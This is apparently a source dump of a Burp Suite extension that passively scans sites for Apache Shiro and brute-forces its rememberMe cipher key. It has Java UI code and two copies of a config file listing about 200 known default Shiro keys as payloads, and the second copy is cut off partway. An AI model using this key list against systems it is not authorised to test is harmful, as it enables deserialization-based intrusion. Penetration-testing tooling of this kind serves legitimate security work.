203 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
204 | String endTime = sdf.format(d);
205 |
206 | synchronized (this.Udatas) {
207 | this.Udatas.set(
208 | id,
209 | new TablesData(
210 | id,
211 | extensionMethod,
212 | encryptMethod,
213 | requestMethod,
214 | url,
215 | statusCode,
216 | issue,
217 | startTime,
218 | endTime,
219 | requestResponse
220 | )
221 | );
222 | fireTableRowsUpdated(id, id);
223 | return id;
224 | }
225 | }
226 |
227 | /**
228 | * 自定义Table
229 | */
230 | private class URLTable extends JTable {
231 | public URLTable(TableModel tableModel) {
232 | super(tableModel);
233 | }
234 |
235 | @Override
236 | public void changeSelection(int row, int col, boolean toggle, boolean extend) {
237 | ScanQueueTag.TablesData dataEntry = ScanQueueTag.this.Udatas.get(convertRowIndexToModel(row));
238 | HRequestTextEditor.setMessage(dataEntry.requestResponse.getRequest(), true);
239 | HResponseTextEditor.setMessage(dataEntry.requestResponse.getResponse(), false);
240 | currentlyDisplayedItem = dataEntry.requestResponse;
241 | super.changeSelection(row, col, toggle, extend);
242 | }
243 | }
244 |
245 | /**
246 | * 界面显示数据存储模块
247 | */
248 | private static class TablesData {
249 | final int id;
250 | final String extensionMethod;
251 | final String encryptMethod;
252 | final String requestMethod;
253 | final String url;
254 | final String statusCode;
255 | final String issue;
256 | final String startTime;
257 | final String endTime;
258 | final IHttpRequestResponse requestResponse;
259 |
260 | public TablesData(int id, String extensionMethod, String encryptMethod,
261 | String requestMethod, String url, String statusCode,
262 | String issue, String startTime, String endTime,
263 | IHttpRequestResponse requestResponse) {
264 | this.id = id;
265 | this.extensionMethod = extensionMethod;
266 | this.encryptMethod = encryptMethod;
267 | this.requestMethod = requestMethod;
268 | this.url = url;
269 | this.statusCode = statusCode;
270 | this.issue = issue;
271 | this.startTime = startTime;
272 | this.endTime = endTime;
273 | this.requestResponse = requestResponse;
274 | }
275 | }
276 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Ui/Tags.java:
--------------------------------------------------------------------------------
1 | package burp.Ui;
2 |
3 | import java.awt.*;
4 | import javax.swing.JTabbedPane;
5 |
6 | import burp.ITab;
7 | import burp.IBurpExtenderCallbacks;
8 |
9 | import burp.Bootstrap.YamlReader;
10 |
11 | public class Tags implements ITab {
12 | private final JTabbedPane tabs;
13 |
14 | private String tagName;
15 |
16 | private BaseSettingTag baseSettingTag;
17 | private ScanQueueTag scanQueueTag;
18 |
19 | public Tags(IBurpExtenderCallbacks callbacks, String name) {
20 | this.tagName = name;
21 |
22 | tabs = new JTabbedPane();
23 |
24 | YamlReader yamlReader = YamlReader.getInstance(callbacks);
25 |
26 | // 扫描队列-窗口
27 | ScanQueueTag scanQueueTag = new ScanQueueTag(callbacks, tabs);
28 | this.scanQueueTag = scanQueueTag;
29 |
30 | // 基本设置-窗口
31 | BaseSettingTag baseSettingTag = new BaseSettingTag(callbacks, tabs, yamlReader);
32 | this.baseSettingTag = baseSettingTag;
33 |
34 | // 自定义组件-导入
35 | callbacks.customizeUiComponent(tabs);
36 |
37 | // 将自定义选项卡添加到Burp的UI
38 | callbacks.addSuiteTab(Tags.this);
39 | }
40 |
41 | /**
42 | * 基础设置tag
43 | *
44 | * @return
45 | */
46 | public BaseSettingTag getBaseSettingTagClass() {
47 | return this.baseSettingTag;
48 | }
49 |
50 | /**
51 | * 扫描队列tag
52 | * 可通过该类提供的方法,进行tag任务的添加与修改
53 | *
54 | * @return
55 | */
56 | public ScanQueueTag getScanQueueTagClass() {
57 | return this.scanQueueTag;
58 | }
59 |
60 | @Override
61 | public String getTabCaption() {
62 | return this.tagName;
63 | }
64 |
65 | @Override
66 | public Component getUiComponent() {
67 | return this.tabs;
68 | }
69 | }
--------------------------------------------------------------------------------
/src/main/resources/config.yml:
--------------------------------------------------------------------------------
1 | # 插件启动项
2 | isStart: true
3 |
4 | # 消息等级
5 | # 用于插件扫描队列界面的显示
6 | # ALL = 显示所有消息
7 | # PIVOTAL = 只显示关键信息,只显示所有前缀带"[+]/[-]/[x]/[*]"的信息
8 | # 注: 乱输等于 PIVOTAL
9 | messageLevel: "PIVOTAL"
10 |
11 | # 扫描配置
12 | scan:
13 | # 站点扫描次数
14 | # 超过次数以后就不在对该站点进行扫描了
15 | # 0 表示无限次扫描
16 | siteScanNumber: 0
17 | # 域名扫描规则
18 | domainName:
19 | # 域名黑名单
20 | # 注: 黑名单优先级最高
21 | # 注: 为空表示关闭该功能
22 | # 使用规则:
23 | # 1. 过滤某个域名: www.domain1.com
24 | # 2. 过滤某个域名的全部子域名: *.domain2.com
25 | # 3. 过滤某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
26 | # 使用方法:
27 | # blacklist:
28 | # - "www.domain1.com"
29 | # - "*.domain2.com"
30 | blacklist:
31 | - "*.dnslog.cn"
32 | - "*.ceye.io"
33 | - "*.fofa.so"
34 | - "*.shodan.io"
35 | - "*.github.com"
36 | - "*.fofa.info"
37 | - "*.nosec.org"
38 | # 域名白名单
39 | # 注: 黑名单优先级最高
40 | # 注: 为空表示关闭该功能
41 | # 使用规则:
42 | # 1. 只扫描某个域名: www.domain1.com
43 | # 2. 只扫描某个域名的全部子域名: *.domain2.com
44 | # 3. 只扫描某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
45 | # 使用方法:
46 | # whitelist:
47 | # - "www.domain1.com"
48 | # - "*.domain2.com"
49 | whitelist:
50 |
51 | # url黑名单后缀
52 | # url的后缀出现这些字段的都不进行测试
53 | urlBlackListSuffix:
54 | config:
55 | isStart: true
56 | suffixList:
57 | - "3g2"
58 | - "3gp"
59 | - "7z"
60 | - "aac"
61 | - "abw"
62 | - "aif"
63 | - "aifc"
64 | - "aiff"
65 | - "arc"
66 | - "au"
67 | - "avi"
68 | - "azw"
69 | - "bin"
70 | - "bmp"
71 | - "bz"
72 | - "bz2"
73 | - "cmx"
74 | - "cod"
75 | - "csh"
76 | - "css"
77 | - "csv"
78 | - "doc"
79 | - "docx"
80 | - "eot"
81 | - "epub"
82 | - "gif"
83 | - "gz"
84 | - "ico"
85 | - "ics"
86 | - "ief"
87 | - "jar"
88 | - "jfif"
89 | - "jpe"
90 | - "jpeg"
91 | - "jpg"
92 | - "m3u"
93 | - "mid"
94 | - "midi"
95 | - "mjs"
96 | - "mp2"
97 | - "mp3"
98 | - "mpa"
99 | - "mpe"
100 | - "mpeg"
101 | - "mpg"
102 | - "mpkg"
103 | - "mpp"
104 | - "mpv2"
105 | - "odp"
106 | - "ods"
107 | - "odt"
108 | - "oga"
109 | - "ogv"
110 | - "ogx"
111 | - "otf"
112 | - "pbm"
113 | - "pdf"
114 | - "pgm"
115 | - "png"
116 | - "pnm"
117 | - "ppm"
118 | - "ppt"
119 | - "pptx"
120 | - "ra"
121 | - "ram"
122 | - "rar"
123 | - "ras"
124 | - "rgb"
125 | - "rmi"
126 | - "rtf"
127 | - "snd"
128 | - "svg"
129 | - "swf"
130 | - "tar"
131 | - "tif"
132 | - "tiff"
133 | - "ttf"
134 | - "vsd"
135 | - "wav"
136 | - "weba"
137 | - "webm"
138 | - "webp"
139 | - "woff"
140 | - "woff2"
141 | - "xbm"
142 | - "xls"
143 | - "xlsx"
144 | - "xpm"
145 | - "xul"
146 | - "xwd"
147 | - "zip"
148 | - "js"
149 | - "wmv"
150 | - "asf"
151 | - "asx"
152 | - "rm"
153 | - "rmvb"
154 | - "mp4"
155 | - "mov"
156 | - "m4v"
157 | - "dat"
158 | - "mkv"
159 | - "flv"
160 | - "vob"
161 | - "txt"
162 | - "php"
163 | - "asp"
164 |
165 | # 应用程序配置
166 | application:
167 | # shiro指纹扩展
168 | shiroFingerprintExtension:
169 | config:
170 | # shiro指纹问题数量
171 | # 表示可以接收同一个站点多少个问题个数
172 | # 超过次数以后就不在对该站点进行扫描了
173 | # 0 表示无限次接收
174 | issueNumber: 3
175 | # 问题名称
176 | issueName: "ShiroFramework"
177 | # shiro加密key扩展
178 | shiroCipherKeyExtension:
179 | config:
180 | # 插件启动项
181 | isStart: true
182 | # 用于判断是否扫描Cbc加密的问题
183 | isScanCbcEncrypt: true
184 | # 用于判断是否扫描Gcm加密的问题
185 | isScanGcmEncrypt: true
186 | # shiro加密key泄漏问题数量
187 | # 表示可以接收同一个站点多少个问题个数
188 | # 超过次数以后就不在对该站点进行扫描了
189 | # 0 表示无限次接收
190 | issueNumber: 1
191 | # 程序运行的最大线程总数
192 | # 最小值为1, 小于等于0, 会重置为1
193 | # 注意:
194 | # 会自动根据输入的shiro加密key总数,来动态启动线程执行任务
195 | # 设置4的话,意思是最多可以开几个线程来执行任务的意思
196 | threadTotal: 4
197 | # 相似度比例
198 | # 1 = 100%, 0.7 = 70%
199 | # 主要用来 shiro跑key请求 对比 原请求 与 必定错误key请求相似度 低于多少会被认为不存在该问题
200 | # 例如:
201 | # shiro跑key请求 与 原请求 相似度低于0.7则认为不存在该问题
202 | # shiro跑key请求 与 必定错误key请求相似度 相似度低于0.7则认为不存在该问题
203 | similarityRatio: 0.7
204 | # 提供商
205 | # 声明使用 Application.ShiroCipherKeyExtension.ExtensionMethod 的哪个类,为该扩展提供服务
206 | provider: "ShiroCipherKeyScan"
207 | # 问题名称
208 | issueName: "ShiroCipherKey"
209 | payloads:
210 | - "kPH+bIxk5D2deZiIxcaaaA=="
211 | - "Z3VucwAAAAAAAAAAAAAAAA=="
212 | - "wGiHplamyXlVB11UXWol8g=="
213 | - "2AvVhdsgUs0FSA3SDFAdag=="
214 | - "3AvVhmFLUs0KTA3Kprsdag=="
215 | - "4AvVhmFLUs0KTA3Kprsdag=="
216 | - "bWljcm9zAAAAAAAAAAAAAA=="
217 | - "WcfHGU25gNnTxTlmJMeSpw=="
218 | - "fCq+/xW488hMTCD+cmJ3aQ=="
219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN"
220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA=="
221 | - "1QWLxg+NYmxraMoxAXu/Iw=="
222 | - "a2VlcE9uR29pbmdBbmRGaQ=="
223 | - "5aaC5qKm5oqA5pyvAAAAAA=="
224 | - "1AvVhdsgUs0FSA3SDFAdag=="
225 | - "5RC7uBZLkByfFfJm22q/Zw=="
226 | - "3AvVhdAgUs0FSA4SDFAdBg=="
227 | - "a3dvbmcAAAAAAAAAAAAAAA=="
228 | - "eXNmAAAAAAAAAAAAAAAAAA=="
229 | - "U0hGX2d1bnMAAAAAAAAAAA=="
230 | - "Ymx1ZXdoYWxlAAAAAAAAAA=="
231 | - "L7RioUULEFhRyxM7a2R/Yg=="
232 | - "UGlzMjAxNiVLeUVlXiEjLw=="
233 | - "bWluZS1hc3NldC1rZXk6QQ=="
234 | - "ZUdsaGJuSmxibVI2ZHc9PQ=="
235 | - "7AvVhmFLUs0KTA3Kprsdag=="
236 | - "MTIzNDU2Nzg5MGFiY2RlZg=="
237 | - "OY//C4rhfwNxCQAQCrQQ1Q=="
238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ"
239 | - "FP7qKJzdJOGkzoQzo2wTmA=="
240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3"
241 | - "LEGEND-CAMPUS-CIPHERKEY=="
242 | - "r0e3c16IdVkouZgk1TKVMg=="
243 | - "ZWvohmPdUsAWT3=KpPqda"
244 | - "k3+XHEg6D8tb2mGm7VJ3nQ=="
245 | - "U3ByaW5nQmxhZGUAAAAAAA=="
246 | - "tiVV6g3uZBGfgshesAQbjA=="
247 | - "ZAvph3dsQs0FSL3SDFAdag=="
248 | - "0AvVhmFLUs0KTA3Kprsdag=="
249 | - "25BsmdYwjnfcWmnhAciDDg=="
250 | - "3JvYhmBLUs0ETA5Kprsdag=="
251 | - "5AvVhmFLUs0KTA3Kprsdag=="
252 | - "6AvVhmFLUs0KTA3Kprsdag=="
253 | - "6NfXkC7YVCV5DASIrEm1Rg=="
254 | - "cmVtZW1iZXJNZQAAAAAAAA=="
255 | - "8AvVhmFLUs0KTA3Kprsdag=="
256 | - "8BvVhmFLUs0KTA3Kprsdag=="
257 | - "9AvVhmFLUs0KTA3Kprsdag=="
258 | - "OUHYQzxQ/W9e/UjiAGu6rg=="
259 | - "aU1pcmFjbGVpTWlyYWNsZQ=="
260 | - "bXRvbnMAAAAAAAAAAAAAAA=="
261 | - "5J7bIJIV0LQSN3c9LPitBQ=="
262 | - "bya2HkYo57u6fWh5theAWw=="
263 | - "f/SY5TIve5WWzT4aQlABJA=="
264 | - "WuB+y2gcHRnY2Lg9+Aqmqg=="
265 | - "3qDVdLawoIr1xFd6ietnwg=="
266 | - "YI1+nBV//m7ELrIyDHm6DQ=="
267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA=="
268 | - "2A2V+RFLUs+eTA3Kpr+dag=="
269 | - "6ZmI6I2j3Y+R1aSn5BOlAA=="
270 | - "SkZpbmFsQmxhZGUAAAAAAA=="
271 | - "2cVtiE83c4lIrELJwKGJUw=="
272 | - "fsHspZw/92PrS3XrPW+vxw=="
273 | - "XTx6CKLo/SdSgub+OPHSrw=="
274 | - "sHdIjUN6tzhl8xZMG3ULCQ=="
275 | - "O4pdf+7e+mZe8NyxMTPJmQ=="
276 | - "HWrBltGvEZc14h9VpMvZWw=="
277 | - "rPNqM6uKFCyaL10AK51UkQ=="
278 | - "Y1JxNSPXVwMkyvES/kJGeQ=="
279 | - "lT2UvDUmQwewm6mMoiw4Ig=="
280 | - "MPdCMZ9urzEA50JDlDYYDg=="
281 | - "xVmmoltfpb8tTceuT5R7Bw=="
282 | - "c+3hFGPjbgzGdrC+MHgoRQ=="
283 | - "ClLk69oNcA3m+s0jIMIkpg=="
284 | - "Bf7MfkNR0axGGptozrebag=="
285 | - "1tC/xrDYs8ey+sa3emtiYw=="
286 | - "ZmFsYWRvLnh5ei5zaGlybw=="
287 | - "cGhyYWNrY3RmREUhfiMkZA=="
288 | - "IduElDUpDDXE677ZkhhKnQ=="
289 | - "yeAAo1E8BOeAYfBlm4NG9Q=="
290 | - "cGljYXMAAAAAAAAAAAAAAA=="
291 | - "2itfW92XazYRi5ltW0M2yA=="
292 | - "XgGkgqGqYrix9lI6vxcrRw=="
293 | - "ertVhmFLUs0KTA3Kprsdag=="
294 | - "5AvVhmFLUS0ATA4Kprsdag=="
295 | - "s0KTA3mFLUprK4AvVhsdag=="
296 | - "hBlzKg78ajaZuTE0VLzDDg=="
297 | - "9FvVhtFLUs0KnA3Kprsdyg=="
298 | - "d2ViUmVtZW1iZXJNZUtleQ=="
299 | - "yNeUgSzL/CfiWw1GALg6Ag=="
300 | - "NGk/3cQ6F5/UNPRh8LpMIg=="
301 | - "4BvVhmFLUs0KTA3Kprsdag=="
302 | - "MzVeSkYyWTI2OFVLZjRzZg=="
303 | - "CrownKey==a12d/dakdad"
304 | - "empodDEyMwAAAAAAAAAAAA=="
305 | - "A7UzJgh1+EWj5oBFi+mSgw=="
306 | - "c2hpcm9fYmF0aXMzMgAAAA=="
307 | - "i45FVt72K2kLgvFrJtoZRw=="
308 | - "66v1O8keKNV3TTcGPK1wzg=="
309 | - "U3BAbW5nQmxhZGUAAAAAAA=="
310 | - "ZnJlc2h6Y24xMjM0NTY3OA=="
311 | - "Jt3C93kMR9D5e8QzwfsiMw=="
312 | - "MTIzNDU2NzgxMjM0NTY3OA=="
313 | - "vXP33AonIp9bFwGl7aT7rA=="
314 | - "V2hhdCBUaGUgSGVsbAAAAA=="
315 | - "Q01TX0JGTFlLRVlfMjAxOQ=="
316 | - "Is9zJ3pzNh2cgTHB4ua3+Q=="
317 | - "SDKOLKn2J1j/2BHjeZwAoQ=="
318 | - "NsZXjXVklWPZwOfkvk6kUA=="
319 | - "GAevYnznvgNCURavBhCr1w=="
320 | - "zSyK5Kp6PZAAjlT+eeNMlg=="
321 | - "bXdrXl9eNjY2KjA3Z2otPQ=="
322 | - "RVZBTk5JR0hUTFlfV0FPVQ=="
323 | - "WkhBTkdYSUFPSEVJX0NBVA=="
324 | - "GsHaWo4m1eNbE0kNSMULhg=="
325 | - "l8cc6d2xpkT1yFtLIcLHCg=="
326 | - "KU471rVNQ6k7PQL4SqxgJg=="
327 | - "kPH+bIxk5D2deZiIxcabaA=="
328 | - "kPH+bIxk5D2deZiIxcacaA=="
329 | - "4AvVhdsgUs0F563SDFAdag=="
330 | - "FL9HL9Yu5bVUJ0PDU1ySvg=="
331 | - "fdCEiK9YvLC668sS43CJ6A=="
332 | - "FJoQCiz0z5XWz2N2LyxNww=="
333 | - "HeUZ/LvgkO7nsa18ZyVxWQ=="
334 | - "HoTP07fJPKIRLOWoVXmv+Q=="
335 | - "iycgIIyCatQofd0XXxbzEg=="
336 | - "m0/5ZZ9L4jjQXn7MREr/bw=="
337 | - "NoIw91X9GSiCrLCF03ZGZw=="
338 | - "oPH+bIxk5E2enZiIxcqaaA=="
339 | - "QAk0rp8sG0uJC4Ke2baYNA=="
340 | - "Rb5RN+LofDWJlzWAwsXzxg=="
341 | - "s2SE9y32PvLeYo+VGFpcKA=="
342 | - "SrpFBcVD89eTQ2icOD0TMg=="
343 | - "Us0KvVhTeasAm43KFLAeng=="
344 | - "YWJjZGRjYmFhYmNkZGNiYQ=="
345 | - "zIiHplamyXlVB11UXWol8g=="
346 | - "ZjQyMTJiNTJhZGZmYjFjMQ=="
347 | - "2adsfasdqerqerqewradsf=="
348 | - "2AvVCXsxUs0FSA7SYFjdQg=="
349 | - "2AvVhdsgERdsSA3SDFAdag=="
350 | - "2AvVhdsgUs0FSA3SaFAdfg=="
351 | - "2AvVhdsgUs0FSA3SDFAder=="
352 | - "2AvVhdsgUsOFSA3SDFAdag=="
353 | - "2AvVhmFLUs0KTA3Kprsdag=="
354 | - "2AvVidsaUSofSA3SDFAdog=="
355 | - "3Av2hmFLAs0BTA3Kprsd6E=="
356 | - "3AvVhdAgUs1FSA4SDFAdBg=="
357 | - "3AvVhMFLIs0KTA3Kprsdag=="
358 | - "3AvVhmFLUs0KTA3KaTHGFg=="
359 | - "3qDVdLawoIr1xFd6ietnsg=="
360 | - "3rvVhmFLUs0KAT3Kprsdag=="
361 | - "4AvVhm2LUs0KTA3Kprsdag=="
362 | - "4AvVhmFLUs0KTA3KAAAAAA=="
363 | - "4AvVhmFLUs0KTA3Kprseaf=="
364 | - "4AvVhmFLUs0TTA3Kprsdag=="
365 | - "4AvVhmFLUs5KTA1Kprsdag=="
366 | - "4AvVhmFLUsOKTA3Kprsdag=="
367 | - "4rvVhmFLUs0KAT3Kprsdag=="
368 | - "4WCZSJyqdUQsije93aQIRg=="
369 | - "5AvVhCsgUs0FSA3SDFAdag=="
370 | - "5oiR5piv5p2h5ZK46bG8IQ=="
371 | - "8AvVhdsgUs0FSA3SDFAdag=="
372 | - "9Ami6v2G5Y+r5aPnE4OlBB=="
373 | - "9AVvhnFLuS3KTV8KprsdAg=="
374 | - "AF05JAuyuEB1ouJQ9Y9Phg=="
375 | - "aG91c2Vob3VzZWhvdXNlMg=="
376 | - "A+kWR7o9O0/G/W6aOGesRA=="
377 | - "AztiX2RUqhc7dhOzl1Mj8Q=="
378 | - "b2EAAAAAAAAAAAAAAAAAAA=="
379 | - "B9rPF8FHhxKJZ9k63ik7kQ=="
380 | - "c2hvdWtlLXBsdXMuMjAxNg=="
381 | - "Cj6LnKZNLEowAZrdqyH/Ew=="
382 | - "duhfin37x6chw29jsne45m=="
383 | - "fCq+/xW488hMTCE+cmJ3FF=="
384 | - "FjbNm1avvGmWE9CY2HqV75=="
385 | - "GhrF5zLfq1Dtadd1jlohhA=="
386 | - "GHxH6G3LFh8Zb3NwoRgfFA=="
387 | - "HOlg7NHb9potm0n5s4ic0Q=="
388 | - "lt181dcQVz/Bo9Wb8ws/Cg=="
389 | - "M2djA70UBBUPDibGZBRvrA=="
390 | - "mIccZhQt6EBHrZIyw1FAXQ=="
391 | - "pbnA+Qzen1vjV3rNqQBLHg=="
392 | - "pyyX1c5x2f0LZZ7VKZXjKO=="
393 | - "QDFCnfkLUs0KTA3Kprsdag=="
394 | - "QF5HMyZAWDZYRyFnSGhTdQ=="
395 | - "qQFtSnnj/sx7vu51ixAyEQ=="
396 | - "QUxQSEFNWVNPRlRCVUlMRA=="
397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ=="
398 | - "R29yZG9uV2ViAAAAAAAAAA=="
399 | - "sBv2t3okbdm3U0r2EVcSzB=="
400 | - "sgIQrqUVxa1OZRRIK3hLZw=="
401 | - "TGMPe7lGO/Gbr38QiJu1/w=="
402 | - "w793pPq5ZVBKkj8OhV4KaQ=="
403 | - "wrjUh2ttBPQLnT4JVhriug=="
404 | - "wyLZMDifwq3sW1vhhHpgKA=="
405 | - "YnlhdnMAAAAAAAAAAAAAAA=="
406 | - "YVd4dmRtVjViM1UlM0QIdn=="
407 | - "YWdlbnRAZG1AMjAxOHN3Zg=="
408 | - "YystomRZLMUjiK0Q1+LFdw=="
409 | - "Z3VucwAAAAAAAAAAAAABBB=="
410 | - "Z3VucwACAOVAKALACAADSA=="
--------------------------------------------------------------------------------
/target/BurpShiroPassiveScan-2.0.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan-2.0.0.jar
--------------------------------------------------------------------------------
/target/BurpShiroPassiveScan.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan.rar
--------------------------------------------------------------------------------
/target/BurpShiroPassiveScan/BurpShiroPassiveScan.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/BurpShiroPassiveScan/BurpShiroPassiveScan.jar
--------------------------------------------------------------------------------
/target/BurpShiroPassiveScan/resources/config.yml:
--------------------------------------------------------------------------------
1 | # 插件启动项
2 | isStart: true
3 |
4 | # 消息等级
5 | # 用于插件扫描队列界面的显示
6 | # ALL = 显示所有消息
7 | # PIVOTAL = 只显示关键信息,只显示所有前缀带"[+]/[-]/[x]/[*]"的信息
8 | # 注: 乱输等于 PIVOTAL
9 | messageLevel: "PIVOTAL"
10 |
11 | # 扫描配置
12 | scan:
13 | # 站点扫描次数
14 | # 超过次数以后就不在对该站点进行扫描了
15 | # 0 表示无限次扫描
16 | siteScanNumber: 0
17 | # 域名扫描规则
18 | domainName:
19 | # 域名黑名单
20 | # 注: 黑名单优先级最高
21 | # 注: 为空表示关闭该功能
22 | # 使用规则:
23 | # 1. 过滤某个域名: www.domain1.com
24 | # 2. 过滤某个域名的全部子域名: *.domain2.com
25 | # 3. 过滤某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
26 | # 使用方法:
27 | # blacklist:
28 | # - "www.domain1.com"
29 | # - "*.domain2.com"
30 | blacklist:
31 | - "*.dnslog.cn"
32 | - "*.ceye.io"
33 | - "*.fofa.so"
34 | - "*.shodan.io"
35 | - "*.github.com"
36 | - "*.fofa.info"
37 | - "*.nosec.org"
38 | # 域名白名单
39 | # 注: 黑名单优先级最高
40 | # 注: 为空表示关闭该功能
41 | # 使用规则:
42 | # 1. 只扫描某个域名: www.domain1.com
43 | # 2. 只扫描某个域名的全部子域名: *.domain2.com
44 | # 3. 只扫描某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
45 | # 使用方法:
46 | # whitelist:
47 | # - "www.domain1.com"
48 | # - "*.domain2.com"
49 | whitelist:
50 |
51 | # url黑名单后缀
52 | # url的后缀出现这些字段的都不进行测试
53 | urlBlackListSuffix:
54 | config:
55 | isStart: true
56 | suffixList:
57 | - "3g2"
58 | - "3gp"
59 | - "7z"
60 | - "aac"
61 | - "abw"
62 | - "aif"
63 | - "aifc"
64 | - "aiff"
65 | - "arc"
66 | - "au"
67 | - "avi"
68 | - "azw"
69 | - "bin"
70 | - "bmp"
71 | - "bz"
72 | - "bz2"
73 | - "cmx"
74 | - "cod"
75 | - "csh"
76 | - "css"
77 | - "csv"
78 | - "doc"
79 | - "docx"
80 | - "eot"
81 | - "epub"
82 | - "gif"
83 | - "gz"
84 | - "ico"
85 | - "ics"
86 | - "ief"
87 | - "jar"
88 | - "jfif"
89 | - "jpe"
90 | - "jpeg"
91 | - "jpg"
92 | - "m3u"
93 | - "mid"
94 | - "midi"
95 | - "mjs"
96 | - "mp2"
97 | - "mp3"
98 | - "mpa"
99 | - "mpe"
100 | - "mpeg"
101 | - "mpg"
102 | - "mpkg"
103 | - "mpp"
104 | - "mpv2"
105 | - "odp"
106 | - "ods"
107 | - "odt"
108 | - "oga"
109 | - "ogv"
110 | - "ogx"
111 | - "otf"
112 | - "pbm"
113 | - "pdf"
114 | - "pgm"
115 | - "png"
116 | - "pnm"
117 | - "ppm"
118 | - "ppt"
119 | - "pptx"
120 | - "ra"
121 | - "ram"
122 | - "rar"
123 | - "ras"
124 | - "rgb"
125 | - "rmi"
126 | - "rtf"
127 | - "snd"
128 | - "svg"
129 | - "swf"
130 | - "tar"
131 | - "tif"
132 | - "tiff"
133 | - "ttf"
134 | - "vsd"
135 | - "wav"
136 | - "weba"
137 | - "webm"
138 | - "webp"
139 | - "woff"
140 | - "woff2"
141 | - "xbm"
142 | - "xls"
143 | - "xlsx"
144 | - "xpm"
145 | - "xul"
146 | - "xwd"
147 | - "zip"
148 | - "js"
149 | - "wmv"
150 | - "asf"
151 | - "asx"
152 | - "rm"
153 | - "rmvb"
154 | - "mp4"
155 | - "mov"
156 | - "m4v"
157 | - "dat"
158 | - "mkv"
159 | - "flv"
160 | - "vob"
161 | - "txt"
162 | - "php"
163 | - "asp"
164 |
165 | # 应用程序配置
166 | application:
167 | # shiro指纹扩展
168 | shiroFingerprintExtension:
169 | config:
170 | # shiro指纹问题数量
171 | # 表示可以接收同一个站点多少个问题个数
172 | # 超过次数以后就不在对该站点进行扫描了
173 | # 0 表示无限次接收
174 | issueNumber: 3
175 | # 问题名称
176 | issueName: "ShiroFramework"
177 | # shiro加密key扩展
178 | shiroCipherKeyExtension:
179 | config:
180 | # 插件启动项
181 | isStart: true
182 | # 用于判断是否扫描Cbc加密的问题
183 | isScanCbcEncrypt: true
184 | # 用于判断是否扫描Gcm加密的问题
185 | isScanGcmEncrypt: true
186 | # shiro加密key泄漏问题数量
187 | # 表示可以接收同一个站点多少个问题个数
188 | # 超过次数以后就不在对该站点进行扫描了
189 | # 0 表示无限次接收
190 | issueNumber: 1
191 | # 程序运行的最大线程总数
192 | # 最小值为1, 小于等于0, 会重置为1
193 | # 注意:
194 | # 会自动根据输入的shiro加密key总数,来动态启动线程执行任务
195 | # 设置4的话,意思是最多可以开几个线程来执行任务的意思
196 | threadTotal: 4
197 | # 相似度比例
198 | # 1 = 100%, 0.7 = 70%
199 | # 主要用来 shiro跑key请求 对比 原请求 与 必定错误key请求相似度 低于多少会被认为不存在该问题
200 | # 例如:
201 | # shiro跑key请求 与 原请求 相似度低于0.7则认为不存在该问题
202 | # shiro跑key请求 与 必定错误key请求相似度 相似度低于0.7则认为不存在该问题
203 | similarityRatio: 0.7
204 | # 提供商
205 | # 声明使用 Application.ShiroCipherKeyExtension.ExtensionMethod 的哪个类,为该扩展提供服务
206 | provider: "ShiroCipherKeyScan"
207 | # 问题名称
208 | issueName: "ShiroCipherKey"
209 | payloads:
210 | - "kPH+bIxk5D2deZiIxcaaaA=="
211 | - "Z3VucwAAAAAAAAAAAAAAAA=="
212 | - "wGiHplamyXlVB11UXWol8g=="
213 | - "2AvVhdsgUs0FSA3SDFAdag=="
214 | - "3AvVhmFLUs0KTA3Kprsdag=="
215 | - "4AvVhmFLUs0KTA3Kprsdag=="
216 | - "bWljcm9zAAAAAAAAAAAAAA=="
217 | - "WcfHGU25gNnTxTlmJMeSpw=="
218 | - "fCq+/xW488hMTCD+cmJ3aQ=="
219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN"
220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA=="
221 | - "1QWLxg+NYmxraMoxAXu/Iw=="
222 | - "a2VlcE9uR29pbmdBbmRGaQ=="
223 | - "5aaC5qKm5oqA5pyvAAAAAA=="
224 | - "1AvVhdsgUs0FSA3SDFAdag=="
225 | - "5RC7uBZLkByfFfJm22q/Zw=="
226 | - "3AvVhdAgUs0FSA4SDFAdBg=="
227 | - "a3dvbmcAAAAAAAAAAAAAAA=="
228 | - "eXNmAAAAAAAAAAAAAAAAAA=="
229 | - "U0hGX2d1bnMAAAAAAAAAAA=="
230 | - "Ymx1ZXdoYWxlAAAAAAAAAA=="
231 | - "L7RioUULEFhRyxM7a2R/Yg=="
232 | - "UGlzMjAxNiVLeUVlXiEjLw=="
233 | - "bWluZS1hc3NldC1rZXk6QQ=="
234 | - "ZUdsaGJuSmxibVI2ZHc9PQ=="
235 | - "7AvVhmFLUs0KTA3Kprsdag=="
236 | - "MTIzNDU2Nzg5MGFiY2RlZg=="
237 | - "OY//C4rhfwNxCQAQCrQQ1Q=="
238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ"
239 | - "FP7qKJzdJOGkzoQzo2wTmA=="
240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3"
241 | - "LEGEND-CAMPUS-CIPHERKEY=="
242 | - "r0e3c16IdVkouZgk1TKVMg=="
243 | - "ZWvohmPdUsAWT3=KpPqda"
244 | - "k3+XHEg6D8tb2mGm7VJ3nQ=="
245 | - "U3ByaW5nQmxhZGUAAAAAAA=="
246 | - "tiVV6g3uZBGfgshesAQbjA=="
247 | - "ZAvph3dsQs0FSL3SDFAdag=="
248 | - "0AvVhmFLUs0KTA3Kprsdag=="
